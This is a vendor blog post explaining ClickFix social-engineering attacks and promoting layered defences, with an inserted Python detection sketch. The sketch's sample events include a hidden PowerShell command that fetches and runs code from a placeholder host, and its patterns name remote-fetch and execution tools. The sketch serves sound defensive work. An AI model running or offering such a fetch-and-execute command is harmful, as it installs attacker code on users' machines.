Phishing attacks are becoming more convincing and harder to spot as cyber criminals adapt to the increasing awareness around traditional attack vectors. For this reason, cyber criminals are changing many of their attack methods to try to avoid security tools.
Enter “ClickFix”, the latest way that cyber criminals are attempting to bypass traditional security controls. Rather than forcing their way into a system by launching a targeted attack, or asking users to download an email attachment that would launch an attack (which would be blocked by most modern security tools), they are attempting to trick users into doing the work for them.
A ClickFix attack is a form of social engineering where a user is manipulated into manually running a malicious command. But why?
In short, most security tools do not look at the action of the user, only the files on the device. If the action of launching an attack is performed by the user, it often appears legitimate to security tools that do not follow the Zero Trust approach to Cyber Security, allowing malware to slip through undetected.
These attacks usually begin with a familiar attack vector, such as a phishing email, an online advert (malvertising), or a compromised website.
The user is redirected to a convincing-looking page that may display a document preview, fake login screen, error message, or request for “verification”. Prompts like “Fix this issue”, “Enable content”, “Log In to Access”, or “Verify you’re human” are often disguised as coming from trusted services and are used to guide the user into taking action.
Once the user follows the instructions, malware is downloaded or remote access to the device is granted. From there, attackers can begin exploiting access without raising immediate alarms. As far as your security tools are concerned, you gave permission to download files or grant remote access to your systems.
Once executed, the impact can be severe. Businesses may face credential or session theft, data exfiltration, unauthorised remote access, and attackers moving laterally across systems in an attempt to cause as much damage as possible. In some cases, persistent malware can remain hidden for long periods, monitoring activity and stealing data while attackers wait for the right moment to strike.
Defending against ClickFix requires more than a single security tool. It needs a layered “zero trust” approach to cyber security throughout your business.
Modern active email threat protection stops phishing attempts before users ever see them, using AI to analyse the content of an email and the intent behind it, including links, sending addresses and attachments, to identify advanced threats.
Endpoint Detection & Response, paired with Zero Trust Endpoint Management, ensures that unusual, suspicious and malicious behaviour is detected quickly, even if a user has already interacted with something malicious.
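As an added illustration of the behaviour-based detection described above (not code from TwentyFour IT Services or any product), the sketch below scores process-creation events for an interpreter that was launched from the desktop shell with a command line that fetches and runs remote content. The event fields, trait list, threshold and sample events are assumptions constructed for the example.

```python
import re

# Assumption: process-creation telemetry reduced to host/parent/image/cmdline.
SHELL_PARENTS = {"explorer.exe"}  # parent when a user types into the Run dialog
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Behavioural traits of a pasted "fix" command (illustrative, not exhaustive).
TRAITS = {
    "remote_fetch": re.compile(r"https?://|\b(iwr|irm|curl|wget)\b", re.I),
    "inline_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "lure_text": re.compile(r"verif|captcha|human|robot", re.I),
}

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def score_event(ev):
    """Traits matched by a user-launched interpreter; [] if out of scope."""
    if basename(ev["parent"]) not in SHELL_PARENTS:
        return []
    if basename(ev["image"]) not in INTERPRETERS:
        return []
    return [name for name, rx in TRAITS.items() if rx.search(ev["cmdline"])]

def detect(events, threshold=2):
    """Return (host, traits) for events matching at least `threshold` traits."""
    return [(ev["host"], hits) for ev in events
            if len(hits := score_event(ev)) >= threshold]

# Constructed sample events; hosts, paths and the URL are placeholders.
SAMPLE_EVENTS = [
    {"host": "WS-01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (irm https://example.invalid/v)"'
                ' # Verify you are human'},
    {"host": "WS-02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /k ipconfig /all"},
    {"host": "WS-03", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "cmdline": "pwsh.exe -NoProfile -Command Get-Process"},
    {"host": "SRV-01", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for host, hits in detect(SAMPLE_EVENTS):
        print(host, hits)
```

Only the WS-01 event is flagged: ordinary administrative use of a command prompt by a user, and interpreters started by services, fall below the threshold or outside the rule's scope.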
However, it is important to remember that user awareness of modern threats is an important first part of every cyber defence strategy. Employees should understand that legitimate services will never ask them to run terminal/command prompt commands or complete unusual “fix” steps. Regular training on modern threats such as these significantly reduces the risk of these attacks succeeding.
TwentyFour IT Services supports businesses with a proactive, “zero trust” approach to cyber security throughout your business, which is designed to detect and prevent threats like ClickFix before they cause harm.
Our Advanced Email Threat Protection identifies and blocks suspicious communications using AI-driven analysis of content and intent. We combine this with continuous endpoint monitoring to detect unusual, suspicious and malicious activity and respond across your devices and network.
Alongside the technology and tools to protect your business from evolving and increasing threats, we also provide tailored cyber security training to ensure your team can recognise modern attack techniques and respond appropriately.
All of this is backed by our own team of cyber security experts in our 24/7/365 Cyber Security Operations Centre (CSOC), who are not only monitoring for potential threats to our clients but also monitoring for industry trends so that we can adapt and protect our clients from emerging threats.
If you want to strengthen your defences against modern cyber threats, TwentyFour IT Services can help you build a more secure and resilient business. Find out more by reaching out to our team and taking our free cyber security health check.